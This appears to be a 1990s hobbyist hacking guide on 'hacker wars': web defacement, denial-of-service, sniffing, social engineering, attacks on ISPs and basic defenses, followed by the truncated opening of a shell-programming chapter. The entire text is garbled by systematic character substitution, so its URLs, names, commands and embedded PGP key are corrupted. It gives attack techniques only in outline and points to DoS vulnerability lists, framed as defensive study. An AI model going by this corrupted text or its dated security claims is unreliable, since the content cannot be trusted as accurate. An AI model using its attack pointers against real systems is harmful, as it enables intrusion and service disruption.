disclaimer: Rust because =ericho and 6odify acted as s.okesmen for the attackers( and in the case of =ericho claimed considerable knowledge of technical details of the attacks( does not mean they are guilty of anything& "osirree& 1 am not saying they did it& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

So( do you want to =oin us in our battle against those cyberna>is( against those who are trying to wi.e out freedom on the 1nternet? Want to enlist in the good guy side of information warfare? 4ne way is to learn and .ractice defensi<e skills against hacker war criminals& 1n this G#6HH "o&, of the 1nformation Warfare Colume we will co<er hacker war only& But an understanding of hacker war will .re.are you for "o& -( which will hel. you .rotect yourself from far broader attacks which can e<en lead to your ddigital death(a and "o& %( which will lay the foundation for becoming an international information warfare fighter& What 3'actly *re Hacker Wars? Hacker wars are attem.ts to damage .eo.le or organi>ations using cybers.ace& #here are se<eral ty.es of hacker war tactics& 1n this Guide we will discuss some of the more common attacks& Web +age Hacking 7ots of .eo.le ask me( `How do 1 hack a Web .age?a *las( gentle reader( the first ste. in this .rocess ought to be .hysiologically im.ossible and unsuitable for descri.tion in a family .ublication& #he ty.ical Web .age hack begins with getting write .ermission to the hy.erte't files on the Web ser<er that has been targeted& *ma>ingly( some Web sites accidentally offer write .ermission to anyone !world writable$ 1f so( all the hacker warrior need do is create a bogus Web .age( gi<e it the same name as the desired .age on the Web site to be hit( and then transfer it <ia ft.& 4therwise it is usually necessary to first break into the Web ser<er com.uter and gain root or administrati<e control& Hacked web .ages usually consist of dirty .ictures and bad language& 1 ha<e hunted down many hacked Web sites& Wise .olitical analysis( witty re.artee and trenchant satire ha<e been absent from e<ery one 1 ha<e e<er seen ?? with the single e'ce.tion of one hack in 1ndonesia by the 3ast #imor freedom fighter grou.& +erha.s because they risked their li<es to ha<e their say( they made their hack count&

But maybe my standards are too high& Rudge for yourself& +arental discretion and antinausea medicine ad<ised& /ollections of hacked Web .ages may be found at htt.:IIwww&skee<e&netI htt.:IIwww&-EMM&comIhackedF.ages Howe<er( e<en if someonebs cause is good and their commentary trenchant( messing u. Web sites is a .itiful way to get across a message& #hey are @uickly fi'ed& 4ne has to hack a really famous Web site to make it into an archi<e& 1f you belie<e in freedom enough to res.ect the integrity of other .eo.le's Web sites( and are serious about making a .olitical statement on the Web( the legal and effecti<e way is to get a domain name that is so similar to the site you o..ose that lots of .eo.le will go there by accident& Hor e'am.le( htt.:IIclinton9E&org was hilarious( clean( effecti<e( and legal& htt.:IIdole9E&org was also taken by .arody makers& #hey are both down now& But they were widely re.orted& 6any .olitical sites linked to them #o get your web s.oof domain name( go to htt.:IIinternic&net& ;ou will sa<e a lot of money by .urchasing it directly from them instead of through an intermediary& 1n fact( all you need to do is .romise to buy a domain name& 1f you get tired of your .arody Web site before you .ay for it( .eo.le ha<e told me they ha<e =ust gi<en the name back to 1nternic and no one demanded .ayment& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose by a giant cor.oration warning: 1f you get a .arody domain name so you can .ut u. a Web site that makes fun of a big cor.oration( e<en though you are not breaking the law( you may get sued& 3<en if you win the lawsuit( you could s.end a lot of money in self defense& But you may be able to get lots of good .ublicity by alerting re.orters to your .light before taking down your Web site& So in the end( es.ecially if you get sued( you may make your <iews known to e<en more .eo.le than if you had hacked their Web site& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1f you want to kee. your Web site from being attacked( 1 recommend using a com.any that does nothing but host Web .ages& #his makes it easier to a<oid being hacked& #his is because the more ser<ices an 1nternet ser<ice .ro<ider offers( the more <ulnerabilities it e'.oses& Hor e'am.le( my

htt.:IItechbroker&com is hosted by a Silicon Gra.hics bo' that does nothing but run a Web ser<er& 6y Jtechbroker&com email( by contrast( is hosted on a machine that does nothing but host a +4+ !.ost office .rotocol$ ser<er& Hor sending out email( 1 use yet another com.uter& 24S *ttacks * second ty.e of hacker war is denial of ser<ice !24S$attacks& Because they harm many .eo.le other than the direct targets( 24S may well be the most serious ty.e of hacker war& S.ammers are a fa<orite target of 24S warriors& S.ammers also( if my sources are telling the truth( fight back& #he wea.on of choice on both sides is the mail bomb& 5ecently !Rune?4ct& ,99K$( hackers fought a massi<e war against s.ammer kingdom /yber +romotions( 1nc& with the *G1S 1nternet backbone .ro<ider caught in the middle& /yber.romo went to court to force *G1S to gi<e it 1nternet access !*G1S e<entually won and kicked off /yber.romo$& But in the meantime it was seriously hurt by a barrage of com.uter <andalism& While the <andals who attacked *G1S .robably think they ha<e a good cause( they ha<e been doing more damage than any hacker war in history( and harming a lot of innocent .eo.le and com.anies in the .rocess& *ccording one source on the *G1S attacks( `#he .erson who really did it 'owned' all of their machines( their routers( and e<erything else inbetween !sic$&a So( although the attacks on *G1S a..arently consisted of com.uter break?ins( the use of the break?ins was to deny ser<ice to users of *G1S& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: *n 1nternet backbone is a su.er high ca.acity communications network& 1t may include fiber o.tics and satellites and new .rotocols such as *synchronous #ransfer 6ode& *n outage in a backbone .ro<ider may affect millions of 1nternet users& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: *ttacking an 1nternet backbone .ro<ider is an es.ecially easy way to get a long( long stay in .rison& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))

4ther 24S attacks include the 1/6+ !1nternet /ontrol 6essage +rotocol$ attacks so familiar to 15/ warriorsA and an ama>ing range of attacks on Windows "# systems& htt.:IIwww&dh.&comI]fyodorI has a good list of these "# 24S <ulnerabilities( while Bronc Busterbs htt.:IIshowdown&org is great for 0ni' 24S attacks& +lease note: we are .ointing these out so you can study them or test your own com.uter or com.uters that you ha<e .ermission to test& While Windows "# is in general harder for criminals to break into( it is generally much easier to carry out 24S attacks against them& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail( get fired andIor get .unched in the nose warning: 24S attacks in general are .athetically easy to launch but in some cases hard to defend against& So not only can one get into all sorts of trouble for 24S attacks ?? .eo.le will also laugh at those who get caught at it& `/ode kiddie 7amer a )))))))))))))))))))))))))))))))))))))))))))))))))))))))) Sniffing Sniffing is obser<ing the acti<ity of onebs <ictim on a network !usually the 1nternet$& #his can include grabbing .asswords( reading email( and obser<ing telnet sessions& Sniffer .rograms can only be installed if one is root on that com.uter& But it isnbt enough to make sure that your 1nternet host com.uters are free of sniffers& ;our email( telnet( ft.( Web surfing ?? and any .asswords you may use ?? may go through -M or more com.uters on their way to a final destination& #hatbs a lot of .laces where a sniffer might be installed& 1f you really( seriously donbt want some cyberna>i watching e<erything you do online( there are se<eral solutions& #he 3udora +ro .rogram will allow you to use the *+4+ .rotocol to .rotect your .assword when you download email& Howe<er( this will not .rotect the email itself from snoo.ers& 1f you ha<e a shell account( Secure Shell !ssh$ from 2atafellows will encry.t e<erything that .asses between your home and shell account com.uters& ;ou can also set u. an encry.ted tunnel from one com.uter on which you ha<e a

shell account to a second shell account on another com.uter ?? if both are running Secure Shell& ;ou may download a free ssh ser<er .rogram for 0ni' at ft.:IIsunsite&unc&eduI.ubI.ackagesIsecurityIsshIssh?,&-&-M&tar&g>( or check out htt.:IIwww&cs&hut&fiIsshI9ft.?sites& 1f you are a sysadmin or owner of an 1S+( get ssh now Within a few years( all 1S+s that ha<e a clue will re@uire ssh logins to shell accounts& Hor a client <ersion that will run on your Windows( 6ac or any <ersion of 0ni' com.uter( see the 2ataHellows site at htt.:IIwww&datafellows&comI& But remember( your shell account must be running the ssh ser<er .rogram in order for your Windows ssh client to work& #o get on the ssh discussion list( email ma=ordomoJclinet&fi with message :subscribe ssh&: But ssh( like *+4+ will not .rotect your email& #he solution? 3ncry.tion& +G+ is .o.ular and can be .urchased at htt.:II.g.&com& 1 recommend using the 5S* o.tion& 1t is a stronger algorithm than the default 2iffie?Hellman offered by +G+& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: 3ncry.tion is scrambling u. a message so that it is <ery hard for anyone to unscramble it unless they ha<e the right key( in which case it becomes easy to unscramble& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: While the 5S* algorithm is the best one known( an encry.tion .rogram may im.lement it in an insecure manner& Worst of all( 5S* de.ends u.on the un.ro<able mathematical hy.othesis that there is no .olynomial time bounded algorithm for factoring numbers& #hatbs a good reason to kee. u. on math news #he key .lot element of the mo<ie `Sneakersa was a fictional disco<ery of a fast algorithm to factor numbers& Way to go( Sneakers writerI.roducer 7arry 7asker )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

;ou can go to =ail warning: 1n many countries there are legal restrictions on encry.tion& 1n the 0S( the 1nternational #raffic in *rms 5egulations forbids e'.ort of any encry.tion software good enough to be worth using& 1f we are serious about freedom of s.eech( we must find ways to kee. our communications .ri<ate& So fighting controls on encry.tion is a key .art of winning the battle against re.ression on the 1nternet& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Social 3ngineering *s we saw in the G#6HH on how to break into com.uters( social engineering usually consists of telling lies that are .oorly thought through& But a skilled social engineer can con<ince you that he or she is doing you a big fa<or while getting you to gi<e away the store& * really skilled social engineer can get almost any information out of you without e<en telling a lie& Hor e'am.le( one hacker .osted his home .hone number on the bulletin board of a large com.any( telling the em.loyees to call him for technical su..ort& He .ro<ided great tech su..ort& 1n e'change( he got lots of .asswords& 1f he had been smart( he would ha<e gotten a real tech su..ort =ob( but then 1 can ne<er figure out some of these ha'or ty.es& 1S+ Hostage #aking * fa<orite .loy of the aggressor in a hacker war is to attack the <ictimbs 1nternet account& #hen they trum.et around about how this .ro<es the <ictim is a lamer& But none of us is res.onsible for managing the security at the 1S+s we use& 4f course( you may get a domain name( set u. a com.uter with lots of security and hook it directly to an 1nternet backbone .ro<ider with a -G hr .hone connection& #hen( checking account de.leted( you could take res.onsibility for your own 1nternet host& But as we learned from the *G1S attacks( e<en 1nternet backbones can get taken down& 1f you .oint this out( that you are not the guy running security on the 1S+ you use( bad guy hackers will insult you by claiming that if you really knew something( you would get a `securea 1S+& ;eah( right& Herebs why it is always easy to break into your account on an 1S+( and almost im.ossible for your 1S+ to kee. hackers out&

While it is hard to break into almost any com.uter system from the outside( there are <astly more e'.loits that will get you su.eruser !root$ control from inside a shell account& So all your attacker needs to do is buy an account( or e<en use the limited time trial account many 1S+s offer( and the bad guy is ready to run ram.ant& ;ou can increase your security by using an 1S+ that only offers +++ !.oint to .oint$ accounts& #his is one reason that it is getting difficult to get a shell account& #hanks( cyberna>is( for ruining the 1nternet for the rest of us& But e<en an 1S+ that =ust offers +++ accounts is more <ulnerable than the ty.ical com.uter system you will find in a large cor.oration( for the sim.le reason that your 1S+ needs to make it easy to use& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: * shell account lets you gi<e 0ni' commands to the com.uter you are on& * +++ account is used to see .retty .ictures while you surf the Web but in itself will not let you gi<e 0ni' commands to the com.uter you are logged into& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) Because it is easy to break into almost any 1S+( ha'or dMMd cyberna>is think it is kewl to take an 1S+ hostage by re.eatedly breaking in and <andali>ing it until the owner surrenders by kicking the <ictim of the attacks off& #his was the ob=ecti<e in the assaults on Succeed&net in 4ct& ,99K& ))))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 1 usually fubar the names of 1S+s in these guides because so many ha'or ty.es attack any com.uter system 1 write about& Succeed&net is a real name& 1f you want to attack it( fine& Rust remember that we ha<e boobytra..ed the heck out of it& So if you attack( men in suits bearing 6iranda cards will .ay you a <isit& ))))))))))))))))))))))))))))))))))))))))))))))))))))))) Why Should 1 Gi<e a 2arn? ?? Ways Bystanders Get Hurt #o most .eo.le( hacker wars are 7egion of 2oom <s& 6asters of 2ece.tion stuff& 1nteresting( but like reading science fiction& But what does it ha<e to do with your life? ;ou may figure that if you ne<er do anything that gets some com.uter dweeb who thinks hebs a ha'or mad( you wonbt ha<e a .roblem&

;et chances are that you may already ha<e been brushed by hacker war& Ha<e you e<er tried to login to your online .ro<ider and couldnbt make a connection? 2id you call tech su..ort and they told you they were `down for maintenancea? #ried to send email and gotten a message `cannot send mail now& +lease try again latera? Sent email that disa..eared into cybers.ace without a trace? Gotten email back with a `0ser unknowna or worse yet( `host unknowna message? Been unable to surf to your fa<orite Web site? 1t could ha<e been technical error !cough( cough$& But it may ha<e been more& * cardinal rule of online ser<ices is to ne<er( e<er admit in .ublic to being hacked& 4nly if a re.orter `outsa them first will they reluctantly admit to the attack& #his is because there are cyberna>i gangs that( when they hear of an online ser<ice under attack( =oin in the attack& Why cyberna>is do this is not clear& Howe<er( what they accom.lish is to make it hard for small com.anies to com.ete with giants such as *merica 4nline& #he giant online ser<ices can afford a large staff of com.uter security e'.erts& So with the cyberna>is ram.aging against the little 1nternet ser<ice .ro<iders( it is not sur.rising that so many of them are selling out to the giants& 1 donbt ha<e any e<idence that the cyberna>is are in the .ay of giants such as *47& 1n fact( 1 sus.ect cyberna>is are trying to dri<e the small com.etitors out of business solely on the general .rinci.le that they hate freedom of anything& 1t is common for hacker wars that start as a .ri<ate disagreement to s.ill o<er and affect thousands or e<en millions of bystanders& Hor e'am.le( in Se.t& ,99E( syn flood attackers shut down the +ani' 1S+ for se<eral days& 1n 4ct& ,99K the 1S+ Succeed&net was shut down by a team of hackers that deleted not =ust Bronc's but also o<er DMM user accounts& 6any other 1S+s ha<e suffered shutdowns from hacker wars( often because the attackers ob=ect to .olitical <iews e'.ressed on their Web .ages& 4n Rune G( ,99K( hacker wars made yet another @uantum lea.( shutting down the 1nternet backbone ser<ice .ro<ider *G1S in retaliation for it allowing /yber.romo and se<eral other s.am em.ires to be customers& #omorrow these skirmishes could .it nation against nation: .ower grids that ser<e hundreds of millions failing in the dead of winterA air traffic control

systems going awry with .lanes crashingA hundreds of billions( trillions of dollars in banking systems disa..earing without a trace& +earl Harbor& 2igital +earl Harbor& Hamine& ;ears before we could climb out of an economic colla.se as bad as the Great 2e.ression& ;ou think this is a ridiculous e'aggeration? #hose of use who ha<e been in the bullseye of the cyberna>is find this future easy to belie<e& Winn Schwartau has been warning the world of this coming disaster since Rune of ,99,& Someone must be listening( because in Se.tember ,99K an industry grou.( formed in the wake of hearings by the 0S Senatebs +ermanent Subcommittee on 1n<estigations( a..ointed Schwartau team leader( 6anhattan /yber +ro=ect 1nformation WarfareI3lectronic /i<il 2efense !see htt.:IIwww&warroomresearch&comImc.I and htt.:IIwww&infowar&com$& Schwartau( in his book 1nformation Warfare( tells us about some of the attacks the cyberna>is ha<e made on his family& #hese attacks ha<e included massi<e credit card fraud( tam.ering with his credit rating( turning off his home .ower and .hone( and e<en tam.ering with the local emergency ser<ices dis.atch system so that all ambulance( fire and .olice calls were directed to his home instead of to those who called 9,, for emergency hel.& #hose of us on the front lines of cyberwar ha<e seen these attacks first hand& #he cyberna>is( as Schwartau disco<ered( were willing to e<en risk the li<es of .eo.le who had nothing to do with him& ;es( we know hacker wars do to us( and we know what it does to you bystanders& Why ;ou 6ay Get Hit Hacker war ha..ens to other .eo.le( right? S.ammers get hacked& Hacker gangs .ick fights with each other& But if you beha<e .olitely around com.uter criminals( you are safe( right? 48( as long as you donbt li<e in the neighborhood of one of us 1nternet freedom fighters like Schwartau or me you are safe& Wrong& 2ead wrong&

7etbs look at an e'am.le of a hacker war( one that doesnbt seem to ha<e any moti<ation at all& Webre talking the 1nternet /hess /lub& "ot e'actly contro<ersial& 1n mid Se.t& ,99E it was shut down by a syn flood attack in the aftermath of daemon9 .ublishing a .rogram to im.lement the attack in the e>ine +hrack& #here ha<e bene many bystanders hit with the wars against this Ha..y Hacker list& 1t all started with cyberna>is who wanted sto. you from getting email from me& Hor e'am.le( on 2ec& E( ,99E( someone had written to the dc? stuff hackers email list !subscribe by emailing ma=ordomoJdis&org with message :subscribe dc?stuff$ saying `1 think they !or maybe 'we'$ will sur<i<e( /arolyn's book&a 5ogue *gent re.lied: 1'm =ust doing my .art to make sure that it doesn't ha..en& *sk not what the network can do for you( ask what you can do for the network& We shall fight them in the routers( we shall fight them in the fiber( we shall fight them in the <a'en&&& 1'm an acti<ist( and 1 won't sto. my acti<ism =ust because 1 know others will take it too far& 4n 2ec -M 5ogue *gent wrote to me: *sk "etta GilboaA her maga>ine's in shambles and her boyfriend's in .rison( while she li<es in fear& *sk Rosh Suittner !author of 6asters of 2ece.tion$A for a while there( he had to change his !unlisted$ .hone number literally e<ery two weeks because of the nightly anonymous calls he was getting& Somehow they always got the new number& *sk Rohn 6arkoff !coauthor of the hacker best?seller #akedown$A he can't e<en let .eo.le know what his email account is or he gets s.ammed the ne't day& #his is not a threat&&& *ll 1'm doing is telling you what's coming&&& you're .laying with fire& #here is a darker element in my culture( and you're going to meet it if you kee. going& `#his is not a threat&a ;eah( right& #hatbs what most of the guys who threaten us say&

Hi<e days later( while it was still dark on /hristmas morning( the owner of the Southwest /yber.ort 1S+ where 1 had an account was woken by an alarm& His mail ser<er was down& "o one using that 1S+ could get email any more&

#hey had been hit by a massi<e mailbombing by someone styling himself =ohnny 'chaotic& =ericho surfaced as the .ublic s.okesman for the attacker( claiming intimate knowledge of his techni@ues and moti<ations& #he e<ening of 2ec& -D( someone cracked the dedicated bo' that /ibola /ommunications had been .ro<iding us at no cost to run the Ha..y Hacker ma=ordomo& #he intruder erased the system files and sent email to the owners threatening worse mayhem if they didnbt ca<e in and boot us off& #he attackers also wi.ed the system files from a com.uter at the 0ni<ersity of #e'as at 3l +aso that 1 was using for research( and sent threats to all email addresses on that bo'& #he attacker called himself G*7H& 1t was not the first or last time that G*7H has struck Ha..y Hacker& 2amaged com.uters( threats( e'tortion( blackmail& #hat's life around here& *fter awhile it gets kinda boring( yawn ?? =ust kidding& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: 1n case you are wondering whether you can get killed in one of these battles( 1 ha<e found no re.orts( not e<en rumors( of any hacker war murders& #hese guys only kill .eo.le by accident as a side effect of their digital mayhem& 7ike sending an ambulance that could sa<e a dying child to the home of an 1nternet freedom fighter instead& Howe<er( if someone should threaten to kill you( you should re.ort it and any associated com.uter attacks& 2es.ite what you may hear( those of us hackers who are not com.uter criminals coo.erate enthusiastically with law enforcement& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))) How to Get into a Hacker War `1 want to fight in a hacker war& How do 1 get in?a 1 get email like this all the time& 6any newbie hackers long for my fre@uent e'.eriences of being attacked by a talented gang of com.uter criminals& #he e'citement #he o..ortunity to go mano a mano with bad dudes and .ro<e you are better than them #here is some truth to this <iew& #o be honest( 1 get a thrill fighting those criminals ?? using legal tactics( of course& Belie<e me( if we catch the Succeed&net attackers( you will hear about it& But before you make the decision to =oin us freedom fighters( count u. the cost& 1t isn't always fun&

But 1b<e stood u. to them& *nd( shoot( 1bm =ust an old lady& So if you want to attract a hacker war( and belie<e you are as tough or tougher than me( be my guest& But before you start .ro<oking attacks( .lease wait for me to get out the ne't two .arts of this 1nformation Warfare series( so you can learn how to re.air your credit rating and reco<er from other digital disasters& ;oubll find .lenty of things in the ne't Guides in this series that will hel. you sur<i<e e<en the most determined hacker war& 3<en the kind of war that attem.ts to steal all you own( wi.e out your identity( and threaten the li<es of your family& So =ust how do you get into a hacker war? #he easiest way is to attend a hacker con<ention& #here are all sorts of twisted .eo.le at these things( kind of like the bar scene in Star Wars& `He said( he doesnbt like the way you look&a 1f you fail to gro<el and suck u. to those dMMd>( or( worse yet( tell them firmly that you fa<or freedom of s.eech( or e<en worse yet( make fun of them for being cyberna>is( you can be in for lots of e'citement& How to 8ee. from Getting /aught ?? "4# So you want to be the attacker in a hacker war? So you think you can kee. from getting caught? *ccording to =ericho( writing in his `H)))ed 0. /ollege 8idsa e>ine( `;ou ha<e media whores like /arolyn 6einel trying to teach .eo.le to hack( writing guides to hacking full of f)))u.s& #elling these .eo.le what to do( but not gi<ing them enough information to ade@uately .rotect themsel<es&a 1 agree with =ericho( if you decide to become a com.uter criminal in a hacker war( 1bm not talented enough to teach you how to kee. from getting caught& 1n fact( no one can teach you how to kee. from getting caught& 1bll tell you e'actly why( too& *t a 2ef /on C .anel 1 hosted !7as Cegas( Ruly ,99K$( =ericho boasted `When 1 break in( 1 close the doors behind me&a He makes a big deal about how hackers can kee. from getting busted by deleting or modifying log files& ;eah& 5ight& "ot 7et me tell you the 53*7 story about what ha..ens when hackers think they are co<ering their tracks& Sure( an ordinary sysadmin canbt restore a deleted file on a 0ni' system& But there are .eo.le out there with the technology to restore deleted files ?? e<en files that ha<e been o<erwritten hundred of times& #hey can restore them regardless of o.erating system& #here are .eo.le out

there who can e'tract e<erything that has been on a hard disk for the last se<eral months ?? or years& 1 know those .eo.le& 1 arrange for them to read those hard disks& Guess whobs toast:$:$:$ #hen there is sur<eillance& Some %,%%K ha'or is sitting at his bo' raising hell and `closing doors after him&a What he doesnbt know is that thanks to a court order ins.ired by his boasts( someone is sitting in a <an a hundred yards away ?? .icking u. e<ery keystroke& Can 3ck radiation( luser& 4r .icking u. the signals that run down the .ower cord of your com.uter& 3<er heard of #em.est? 3<en if the cybercrime detecti<e doesnbt ha<e all this high?tech hardware on hand( the history of hacker crime shows that criminals will talk in e'change for lenient sentencing& /ommit one easy?to?.ro<e federal felony( letbs say .osting someonebs stolen email on onebs .ublic ft. ser<er !who do we know who has done this?$( and the Heds ha<e lots of bargaining .ower against him& So e<en if 1 wanted to hel. .eo.le become ubercriminals( 1 canbt& "ot because 1 donbt know how& Because there is no way& #he %,%%K dMMd> who tell you otherwise are seriously ignorant& 1 .redict the Succeed&net attackers are will wind u. in =ail& Soon& +erha.s not for that crime& But their days of freedom are numbered& 1t is only a matter of .icking which of their many crimes will hold u. best in court( and who will gi<e e<idence against whom& #ime to study game theory ?? can you say `.risonersb dilemma(a wannabe ubercriminals? Whobs the narc? `But( but(a 1 can hear the Su.er 2u.er com.uter criminals s.uttering& `6y buddies and 1 break the law all the time and web<e ne<er been busted& 48( 48( my other buddy got busted( but he was lame&a 1tbs =ust a matter of time& #hey need to go straight before their number is u.& 4r make the decision to obtain their `get out of =ail freea cards by informing on their gang before their day of doom comes u.& #hey ha<e much better bargaining .ower if they make a deal before arrest& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1f you ha..en to be a cyberna>i who is ha<ing second thoughts( and would like hel. making a deal with the authorities( .lease contact me anonymously using my .g. key:

?????B3G1" +G+ +0B71/ 83; B74/8????? Cersion: +G+ for +ersonal +ri<acy 5&M mS3"*>5W;ac***31*7;=Wh>dD@4I6teHrb-.9Ss;5GHdH*'#K5,6G UI=t5"dIC85 @/RoSGHIkSE"ws6Imo.=dGyCun'<sGS08KeQ5*-rQu3.sG3adUwwB+1E% 5fHci5o BiUs9fG;t.#'Kb<9dR3IQ9t<edDs-GasibME<72@>y/H2Ur5o;74D+w3mif wWCWW 47X5#hG5mEcirUuwi,1d=yEE*QwtD*5Hnns5H*54/bD-"W5G5sH8b85-u -w0f#Kr5RgM1/tIWtQdr-dBccU3g.,-%-s5rgwi5<@mG=64ru02f0-n"HH%.4kDRr ef1Ul dwCMy=3rbKwcec/H1rHfS8c'Co"UHlgREafe+=c*B5GMRM"hcm9seWGg# WC.bmCs 12'=bWC.bmCsSH5l;-hicm9rQU1u;-9t+okBHS6H325W;aceW*n..9 GX"w3B9bsH IilWg#-i'%BK90Hfr=S393;/=8h,/Wi1G6ohd==mCDS%lSR1oik+t0Q"akGl B#hI wu25eaM2Quo2eEiG3agBm5g#/<*#US@2KGUt"SQS+h1S64ytR0R7lmu *n23m9EUS %M'guSHrU"=H;S,9.r3,yi-<SeI+RKI8,SSwyK-5h=15fn@G#nld'loa3S"<ur 8h 6c%GwSWH,Rm.aHu.%Xhr3w0'cS-+Rn%'kgc=8k=,'Kem21G7/gH,51R2 76E%S5Ru b/@odum=UM.eDkH7%t5a2u'Xe*QGQ2K%H<HGl;iKS78G2wU,C<9fmbR HGt/@o%.@ 5BhG%-Umk#u2eM33'dS3#XwW WM9h2 ?????3"2 +G+ +0B71/ 83; B74/8????? )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) How to +rotect yourself in a Hacker War What( you donbt find getting caught u. in a hacker war immensely entertaining? ;ou donbt want to be the innocent bystander caught in the crossfire of an rm command? Here are a few rules that can hel. you& But remember( these are only the most basic of .rotections& Webll co<er the industrial?strength techni@ues in later Guides in this series( as well as how to catch the cul.rits&

#o. #en Beginner 2efenses in Hacker Wars ,M$ Backu.( backu.( backu.& 9$ *ssume anything is being sniffed( unless .rotected by strong encry.tion& D$ *ssume your .hone is ta..ed& K$ "e<er( ne<er( e<er telnet into your shell account& 0se Secure Shell instead& E$ +ick a good .assword& 1t should be long( not a name or a word from a dictionary( and should include numbers andIor characters such as J9OPBN)& 1f you use a com.uter where others ha<e .hysical access to it( donbt write your .assword on anything& 5$ #his a..lies to shell accounts: assume your attacker will get root control anyhow( so your .assword wonbt do you any good& #hat means you should encry.t any files you donbt want to ha<e .assed around( and send your shell history files to Ide<Inull each time you log out& G$ 2o you use the +ine or 3lm email .rograms? 2onbt kee. email addresses in your shell account& ;our sa<ed mail files are a good .lace for cyberna>is to find email addresses and send out threatening and obscene messages to them& G*7H s.eciali>es in this tactic& %$ 5egularly .atrol your Web site& ;ou ne<er know when it may s.rout rude body .arts or naughty words& +referably use a Web ser<er hosted on a com.uter system dedicated to nothing but Web sites& Best of all( use a 6ac4S web ser<er& -$2isable Ra<a on your Web browser& 2onbt e<en )think) of using *cti<eU or 1nternet 3'.lorer& *nd( the number one defense: ,$ Roin us 1nternet freedom fighters& 1t will take many of us to win the battle against those who want to .ick and choose whose <oices will be heard on the 1nternet& ^+ictureV /ontents of Colume 5: Shell +rogramming FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Guide to !mostly$ Harmless Hacking

Col& 5 +rogrammers' Series "o& ,: Shell +rogramming FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Honest to gosh ?? .rogramming is easy& 1f you ha<e ne<er .rogrammed in your life( today( within minutes( you will become a .rogrammer& 1 .romise& *nd e<en if you are already a .rogrammer( in this Guide you =ust might disco<er some new tricks that are lots of fun& *ma>ingly enough( many .eo.le who call themsel<es hackers don't know how to .rogram& 1n fact( many el,te ha'or ty.es claim they don't need to know how to .rogram( since com.uter .rograms that do kewl stu.h like break into or crash com.uters are a<ailable for download at those Hac8%r Web sites with the animated flames and skulls and doom?laden organ music& But =ust running other .eo.le's .rograms is not hacking& Breaking into and crashing other .eo.le's com.uters is not hacking& 5eal hacking is e'.loring and disco<ering ?? and writing your own .rograms )))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1n this Guide you will learn: ) Why should hackers learn how to .rogram? ) What is shell .rogramming? ) How to create and run scri.ts ) Shell scri.ts on the fly ) Slightly stealthy scri.ts ) 3'am.les of fun hacker scri.ts +lus( in the e<il genius ti.s( you will learn how to: ) #alk about the #urning 6achine Halting +roblem #heorem as if you are some sort of forking genius ) Hind instructions on how to create deadly <iruses ) Set your fa<orite editor as default in +ine ) 7ink your bash history file to de<Inull ) 8ee. sim.le #ro=ans from e'ecuting in your account ) Sa<e yourself from totally messing u. your &tcshrc( &bashrc etc& files&

))))))))))))))))))))))))))))))))))))))))))))))))))))))) Why Should Hackers 7earn How to +rogram? Back in ,9K,( when 1 was -G( 1 was as nontechnical as they come& But my husband at the time( H& 8eith Henson( was always talking about :buffer in(: :buffer out: and assembly language stuff& 8eith was one of the earliest of hackers( and a hacker in the .ure sense( someone who wasn't afraid to try unusual things to sa<e memory !a scarce resource on e<en the biggest com.uters of the ,9KMs$ or cut /+0 cycles& So one Rune morning( tired of me looking da>ed when he came home babbling e'citedly about his latest feat( he announced( :;ou're going to learn how to .rogram&: He insisted that 1 sign u. for a course in Hortran at the 0ni<ersity of *ri>ona& #he first class assignment was to sit at a .unch card machine and bang out a .rogram for the /2/ EGMM that would sort a list of words al.habetically& 1t was so fun that 1 added code to detect in.ut of characters that weren't in the al.habet( and to gi<e an error message when it found them& #he instructor .raised me in front of the class( saying 1 was the only one who had coded an e'tra feature& 1 was hooked& 1 went on to write .rograms with enough length and com.le'ity that debugging and <erifying them ga<e me a feel for the reality of the #uring 6achine Halting +roblem theorem& 1 disco<ered you don't ha<e to be a genius to become a .rofessional .rogrammer& ;ou =ust ha<e to en=oy it enough to work hard at it( en=oy it enough to dream about it and fantasi>e and .lay with .rogramming in your mind e<en when you aren't in front of a keyboard& )))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius ti.: #he #uring 6achine Halting +roblem theorem says that it is im.ossible to thoroughly debug ?? or e<en e'.lore ?? an arbitrary com.uter .rogram& 1n .ractical terms( this means that it su.er hard to make a com.uter network totally secure( and that it will ne<er be .ossible to write an anti<irus .rogram that can .rotect against all concei<able <iruses& Hor a more rigorous treatment of the #uring 6achine Halting +roblem theorem ?? yet written in language a non?mathematician can understand ?? read the

